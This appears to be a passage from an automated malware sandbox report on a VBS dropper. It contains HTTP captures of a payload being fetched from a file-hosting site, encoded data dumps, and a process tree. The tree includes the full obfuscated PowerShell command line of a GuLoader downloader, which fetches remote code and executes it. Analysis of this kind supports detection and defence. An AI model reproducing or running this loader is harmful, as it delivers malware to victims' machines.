                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 70 7a 65 75 2b 4e 44 31 6f 51 62 30 48 4e 77 6c 62 47 6b 45 76 72 41 31 55 5a 55 64 77 71 69 41 45 4c 55 4c 69 71 4b 4a 48 4b 4b 51 75 4d 54 74 77 4c 59 48 50 39 54 6d 72 4b 47 66 57 72 35 44 59 44 6d 4f 6f 77 48 4d 43 6e 67 70 48 58 77 45 31 64 68 4a 67 70 78 4e 59 4e 35 55 66 59 68 2f 62 5a 4b 32 4b 5a 33 49 68 59 2b 70 78 7a 4c 50 6a 35 44 69 66 31 52 35 37 44 6a 30 37 31 6c 31 49 55 69 42 47 38 68 5a 4b 54 36 59 71 53 53 2b 75 4b 6b 6b 76 72 69 70 4a 4c 36 34 71 53 53 2b 75 4b 6b 6b 76 72 69 70 4a 4c 36 34 71 53 53 2b 75 4b 6b 6a 56 2b 4b 4c 77 6f 32 34 4a 6a 55 6d 41 33 33 6b 6e 72 69 6e 71 31 4e 49 69 53 77 6d 61 43 6b 45 76 72 4d 77 6b 4a 73 49 45 54 75 75 33 36 52 7a 2b 35 4d 4c 6f 4f 6c 33 55 54 75 62 48 2b 58 67 74 71 53 46 73 6e 77 64 59 54 75
                                                                          Data Ascii: pzeu+ND1oQb0HNwlbGkEvrA1UZUdwqiAELULiqKJHKKQuMTtwLYHP9TmrKGfWr5DYDmOowHMCngpHXwE1dhJgpxNYN5UfYh/bZK2KZ3IhY+pxzLPj5Dif1R57Dj071l1IUiBG8hZKT6YqSS+uKkkvripJL64qSS+uKkkvripJL64qSS+uKkjV+KLwo24JjUmA33knrinq1NIiSwmaCkEvrMwkJsIETuu36Rz+5MLoOl3UTubH+XgtqSFsnwdYTu
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 75 4b 69 4b 79 6e 52 68 50 4f 5a 49 75 53 53 32 4a 67 38 62 6d 4e 73 31 67 74 62 6c 50 52 74 47 59 46 6b 30 76 72 2f 32 5a 7a 4d 73 6b 57 6d 52 78 4d 6b 6c 79 6d 33 31 56 49 59 32 57 51 57 32 72 33 37 73 37 58 69 70 4a 45 62 31 52 62 74 42 51 4c 6f 53 44 73 4e 34 66 4b 32 48 6e 58 5a 35 61 79 57 73 38 46 43 37 6e 63 53 68 72 43 73 32 70 4a 52 58 31 6a 69 42 4f 67 4f 4c 77 61 53 59 30 50 53 49 7a 6f 6c 70 6a 45 78 65 79 72 6b 57 39 61 45 33 67 61 4a 75 7a 70 61 72 6d 58 53 58 74 5a 65 55 46 6d 57 73 37 53 4c 52 50 79 52 63 34 57 45 33 68 77 51 72 42 50 62 33 52 56 7a 6f 75 49 6b 6b 75 44 7a 6f 38 4a 61 76 66 69 46 35 79 4b 6b 6b 52 6b 71 71 56 50 36 77 73 2f 4b 2b 6d 4b 6b 72 63 73 56 38 49 74 62 6c 67 54 2f 6f 75 49 6b 6b 76 36 4c 61 51 33 61 67 2f 79 53
                                                                          Data Ascii: uKiKynRhPOZIuSS2Jg8bmNs1gtblPRtGYFk0vr/2ZzMskWmRxMklym31VIY2WQW2r37s7XipJEb1RbtBQLoSDsN4fK2HnXZ5ayWs8FC7ncShrCs2pJRX1jiBOgOLwaSY0PSIzolpjExeyrkW9aE3gaJuzparmXSXtZeUFmWs7SLRPyRc4WE3hwQrBPb3RVzouIkkuDzo8JavfiF5yKkkRkqqVP6ws/K+mKkrcsV8ItblgT/ouIkkv6LaQ3ag/yS
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 41 33 39 45 6e 72 69 71 71 6c 4c 49 71 7a 71 69 4b 41 39 4c 77 70 48 6b 48 4b 32 38 4d 44 50 6e 67 4c 37 7a 74 32 6d 35 4a 4c 35 41 34 4e 54 4f 2b 4b 45 33 73 62 78 4d 57 4c 61 72 70 58 46 6a 4b 6c 39 4d 34 72 6a 7a 51 52 42 6f 79 2f 36 62 46 6e 6c 4d 34 7a 54 5a 4a 66 62 4b 58 4f 79 74 76 4f 46 49 30 72 43 36 49 6b 51 4a 6e 70 79 74 73 52 75 33 7a 55 73 6d 57 4d 62 6d 4b 54 53 2b 74 57 4b 64 36 37 44 6b 6a 4f 49 41 73 58 6f 2b 71 4b 6b 70 65 79 6d 46 58 50 46 67 73 2f 6f 2b 71 4b 6b 72 35 37 52 31 2f 4b 52 6d 4b 54 53 2b 74 4b 46 70 47 69 79 6d 33 47 41 34 75 53 53 35 35 39 30 6f 7a 72 59 73 52 34 79 67 39 41 79 74 74 79 4e 4e 74 6e 43 37 70 64 36 39 49 4d 63 77 77 4c 6f 67 30 64 46 39 57 4d 62 6b 69 54 53 2b 76 74 45 76 61 34 66 46 48 7a 61 6a 39 51 53
                                                                          Data Ascii: A39EnriqqlLIqzqiKA9LwpHkHK28MDPngL7zt2m5JL5A4NTO+KE3sbxMWLarpXFjKl9M4rjzQRBoy/6bFnlM4zTZJfbKXOytvOFI0rC6IkQJnpytsRu3zUsmWMbmKTS+tWKd67DkjOIAsXo+qKkpeymFXPFgs/o+qKkr57R1/KRmKTS+tKFpGiym3GA4uSS5590ozrYsR4yg9AyttyNNtnC7pd69IMcwwLog0dF9WMbkiTS+vtEva4fFHzaj9QS
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 75 4b 6b 6b 76 72 69 70 4a 4c 6b 43 42 46 30 48 63 41 4b 70 4e 4b 47 34 39 6b 59 68 2b 71 53 65 75 4b 47 34 47 35 41 51 64 7a 36 59 71 53 48 46 53 72 32 42 53 6c 43 32 56 59 6f 61 6c 4a 79 68 79 55 58 7a 64 2b 41 36 33 53 2b 32 72 55 6c 53 54 6d 61 47 52 4d 35 72 78 6b 35 5a 7a 63 75 4f 6d 68 48 64 52 63 58 68 4d 6f 6f 4a 70 30 33 32 6d 63 51 54 4c 37 76 70 41 4d 47 70 67 53 47 42 62 56 62 54 33 37 52 68 38 55 64 63 35 30 75 54 55 46 4a 76 44 61 67 6d 4f 35 6c 62 63 68 32 37 54 59 47 42 7a 57 77 6d 34 51 4f 78 32 63 65 61 62 70 74 79 2f 4e 64 70 4d 30 2b 43 4d 32 63 75 4f 51 65 44 41 71 44 42 6b 65 79 34 6e 45 58 32 49 48 69 45 6e 72 69 68 75 61 75 67 45 66 55 65 6d 4b 6b 6f 64 61 51 4a 62 44 73 6b 39 59 53 57 4c 5a 55 43 58 70 58 2f 48 4b 6c 69 34 63 45
                                                                          Data Ascii: uKkkvripJLkCBF0HcAKpNKG49kYh+qSeuKG4G5AQdz6YqSHFSr2BSlC2VYoalJyhyUXzd+A63S+2rUlSTmaGRM5rxk5ZzcuOmhHdRcXhMooJp032mcQTL7vpAMGpgSGBbVbT37Rh8Udc50uTUFJvDagmO5lbch27TYGBzWwm4QOx2ceabpty/NdpM0+CM2cuOQeDAqDBkey4nEX2IHiEnrihuaugEfUemKkodaQJbDsk9YSWLZUCXpX/HKli4cE
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 67 4c 6c 6d 2b 5a 75 6f 35 6d 46 50 2b 32 77 6e 62 33 6b 45 76 72 4d 53 67 70 6d 6a 48 30 63 69 6b 4c 59 51 2b 77 66 45 6e 4b 47 49 35 49 52 55 6c 39 55 48 57 51 4b 2f 4c 4f 4f 67 74 52 54 66 66 38 72 78 68 67 46 2b 39 4a 36 34 6f 57 76 34 50 63 59 79 51 39 44 6e 54 4b 37 36 36 6e 67 65 46 30 45 30 2f 50 48 31 42 34 46 33 78 56 47 32 71 4f 74 71 74 71 32 37 32 39 4c 59 4d 62 78 72 4f 49 6b 6b 74 71 64 42 4a 66 39 38 45 72 38 50 31 53 62 4d 6f 61 39 37 2b 42 74 51 39 5a 79 67 4c 79 69 35 6b 4c 43 33 73 46 79 63 6f 74 4c 57 35 54 77 33 4d 4e 41 52 38 54 36 59 71 53 7a 7a 6b 44 4a 37 62 71 69 70 4c 31 44 55 66 64 63 47 39 32 45 37 33 54 2b 4f 38 79 48 45 74 48 2b 70 43 73 45 34 33 49 35 4c 78 56 61 6e 79 54 5a 59 72 71 78 4d 42 65 64 35 4e 4c 36 37 4e 54 6f
                                                                          Data Ascii: gLlm+Zuo5mFP+2wnb3kEvrMSgpmjH0cikLYQ+wfEnKGI5IRUl9UHWQK/LOOgtRTff8rxhgF+9J64oWv4PcYyQ9DnTK766ngeF0E0/PH1B4F3xVG2qOtqtq2729LYMbxrOIkktqdBJf98Er8P1SbMoa97+BtQ9ZygLyi5kLC3sFycotLW5Tw3MNAR8T6YqSzzkDJ7bqipL1DUfdcG92E73T+O8yHEtH+pCsE43I5LxVanyTZYrqxMBed5NL67NTo
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 62 32 6b 45 76 72 32 79 74 72 70 62 32 75 79 69 70 4f 42 73 6f 35 43 32 4f 52 79 47 45 33 79 69 71 6a 72 65 65 2f 41 36 74 79 35 43 61 31 63 79 2f 7a 46 43 43 42 76 59 32 2b 50 46 73 57 67 61 49 6c 41 5a 67 33 6d 4b 43 74 50 47 4d 49 41 68 37 2f 39 43 36 76 51 67 51 4c 4a 51 72 41 6f 64 52 35 49 75 50 46 30 78 76 2b 77 49 69 53 53 31 56 53 6c 34 4d 64 52 67 67 2b 6d 78 4e 31 7a 78 73 72 6e 69 55 62 46 2f 72 78 70 69 53 64 55 48 67 70 33 71 70 76 43 45 70 6b 39 2b 69 38 61 34 32 7a 55 7a 63 4a 76 53 61 52 66 38 41 54 76 57 4b 41 65 6a 57 36 4d 78 55 55 66 42 59 54 75 76 30 4b 4f 52 35 71 59 33 71 70 46 6a 77 54 75 73 6e 34 6d 59 6c 71 59 78 6e 47 33 6c 72 42 31 32 4a 70 6d 30 42 32 73 6b 41 32 38 4e 47 47 52 50 58 4c 51 4c 62 64 6d 73 6a 62 44 4f 78 65 63
                                                                          Data Ascii: b2kEvr2ytrpb2uyipOBso5C2ORyGE3yiqjree/A6ty5Ca1cy/zFCCBvY2+PFsWgaIlAZg3mKCtPGMIAh7/9C6vQgQLJQrAodR5IuPF0xv+wIiSS1VSl4MdRgg+mxN1zxsrniUbF/rxpiSdUHgp3qpvCEpk9+i8a42zUzcJvSaRf8ATvWKAejW6MxUUfBYTuv0KOR5qY3qpFjwTusn4mYlqYxnG3lrB12Jpm0B2skA28NGGRPXLQLbdmsjbDOxec


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.849710172.67.170.1054436052C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 16:25:58 UTC175OUTGET /pro/dl/8gikly HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: www.sendspace.com
                                                                          Cache-Control: no-cache
                                                                          2024-05-23 16:25:59 UTC948INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 23 May 2024 16:25:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: SID=7cbl3ctvlcko76s2guour4vig6; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Location: https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6uyUX4BCRRBJUBstDbZGyZu0Kb8avxED5iZnComQ1A%2BbputgQLO0R99ZZXjnCOUW4eqOiYB7GP%2FIdBImoUsiuZVhTpYLtrUo%2FRC8ZyCJ3t6oOYZUU65kynnBHiw9oxkRvT0Kg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 888667ad9e835e7e-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-05-23 16:25:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.84971169.31.136.574436052C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 16:26:00 UTC306OUTGET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: fs13n3.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: SID=7cbl3ctvlcko76s2guour4vig6
                                                                          2024-05-23 16:26:00 UTC430INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 23 May 2024 16:26:00 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 36928
                                                                          Last-Modified: Wed, 15 May 2024 07:47:41 GMT
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Content-Disposition: attachment;filename="WySjCpJeTvpFxCC108.bin"
                                                                          ETag: "6644689d-9040"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-23 16:26:00 UTC15954INData Raw: b2 f9 82 1c 39 ac 3e 38 0c 95 23 1a 94 b1 a4 a7 4e c3 61 45 f8 56 2f 11 a4 0d 2d 94 66 3a 7e 0f b1 cc 94 c8 4d fb 86 68 87 57 1e 9d 1c 25 2c dd 79 0c db 0f e1 5c 01 87 d0 3a 1a 4f 7c f6 dc d0 f1 74 89 8d 6a de dd 09 58 d1 a8 58 5b 2d 2e 44 8c 87 1b a6 ba 20 9a 70 5d 28 bf e3 46 5e c8 a1 38 9d 45 52 2e e1 18 e2 46 9f b0 ed a8 76 5f 68 0c c6 c3 d1 db 2f 36 d0 45 66 2b 75 47 de da a9 06 22 1d 4b 06 c1 9d f7 95 e6 dd 6f ec 5a b9 00 ab c5 09 d0 83 cc 0d 03 7c cb 50 de fb 0c 28 07 1d ab 25 e2 1a 23 5e 39 04 4d fb fe 94 82 ba 9d 7c a8 48 b2 7a a2 d6 12 83 b3 c7 57 75 33 fc 50 dc 9d 0e 8f e2 83 7e f2 bc f6 8d 2d 2c f1 be e1 ef 92 3a 8a 98 d0 2c 87 ab ef f1 a6 25 47 32 80 e5 87 6f 70 13 34 e3 d5 7d 82 68 89 ff c0 12 0f ca 11 44 3f f9 87 bd b0 f2 1a 5e 47 84 67 37
                                                                          Data Ascii: 9>8#NaEV/-f:~MhW%,y\:O|tjXX[-.D p](F^8ER.Fv_h/6Ef+uG"KoZ|P(%#^9M|HzWu3P~-,:,%G2op4}hD?^Gg7
                                                                          2024-05-23 16:26:00 UTC16384INData Raw: 9c 45 f1 2a 90 c7 5e 54 b5 54 8d f6 38 96 21 69 f1 92 d7 e4 19 69 2c ec 34 a5 6e 57 91 ae 7d 0a b5 3a 44 a1 ce 37 48 0b a6 5d ce 46 87 ed f7 79 e7 8a f5 9f e8 13 c1 7b 6f dd a1 fc 1c 05 c9 63 e1 52 34 40 2d a9 23 df 95 2c 93 dc be fb e1 89 9f c7 f5 fa 4e 1e 30 97 ec b8 49 f1 1b 9a aa 1a a3 df 54 8e d6 67 bb e0 16 db 75 bc 19 8f 90 25 ac 43 e3 20 5d 5b f6 a4 28 fb 68 ae 54 d5 d0 9e 25 d2 df 06 a5 1d 5a 89 53 e0 d9 06 a7 92 e8 64 07 e6 f1 e0 69 cf 7a 60 bc be c8 2d 83 1f df 9e b3 a2 84 2f 38 5c 45 7b e5 9b 7e 73 ad 7b 39 3c 16 6b 99 43 64 b7 f5 28 aa 33 d7 16 9f eb f7 ed 6e 57 92 fb 1f 17 0b c2 79 19 4d 04 c0 a1 c9 67 43 33 27 04 08 6b 0c ba d5 3c da 4c 66 a4 01 da 4d f8 4a 47 14 a4 14 12 51 9b 90 24 1e c4 2f eb d3 44 b3 e4 4b b1 e0 02 18 3e 78 88 b1 25 66
                                                                          Data Ascii: E*^TT8!ii,4nW}:D7H]Fy{ocR4@-#,N0ITgu%C ][(hT%ZSdiz`-/8\E{~s{9<kCd(3nWyMgC3'k<LfMJGQ$/DK>x%f
                                                                          2024-05-23 16:26:00 UTC4590INData Raw: b6 2d b8 e9 ab 72 69 19 a6 71 a5 94 61 46 68 71 8d 47 85 33 49 3b 5e 20 24 94 d8 d8 c8 e9 bc 13 da 29 d3 54 ae c3 11 ab b3 c0 5f 7c 3a e1 55 9e e9 06 86 b6 87 7d f0 c8 81 b4 4f 2c f0 b6 e9 eb 92 3b 88 76 e4 4f 86 c2 ee 99 a6 41 c1 57 80 83 8f 08 70 7b 34 8a d5 49 27 03 89 93 e0 7f 0f a4 d1 2b 3f 89 87 8c b0 80 3a 2d 47 f0 65 42 fd 16 81 13 2c 87 d8 d7 f0 a5 4c 27 22 e8 5f e2 e7 12 a3 39 a8 8e 7a 88 c3 48 6d ab 0b e1 e5 44 3e 16 a9 c6 f1 f0 fa e9 9c 8d 2d db f4 3b c8 d0 6f 23 e8 6d 48 ae 57 96 68 64 80 74 f4 84 b9 98 8e 12 41 42 cf 0e 53 8c 7c 49 24 34 66 36 49 4b 76 ab ad 60 3e 62 7e f7 89 67 5e 8a 53 0f ce d8 55 80 aa 7a 85 fa 5e 8c 51 40 bd 8a 34 68 c6 30 52 cd 36 82 96 94 b7 50 65 3a c9 ae e1 0c c9 5b 32 32 2b 53 6a ad fd 5b bc 80 ae 1a 40 11 20 0b f7
                                                                          Data Ascii: -riqaFhqG3I;^ $)T_|:U}O,;vOAWp{4I'+?:-GeB,L'"_9zHmD>-;o#mHWhdtABS|I$4f6IKv`>b~g^SUz^Q@4h0R6Pe:[22+Sj[@


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:1
                                                                          Start time:12:25:02
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
                                                                          Imagebase:0x7ff6226c0000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:12:25:09
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
                                                                          Imagebase:0x7ff6cb6b0000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:12:25:09
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
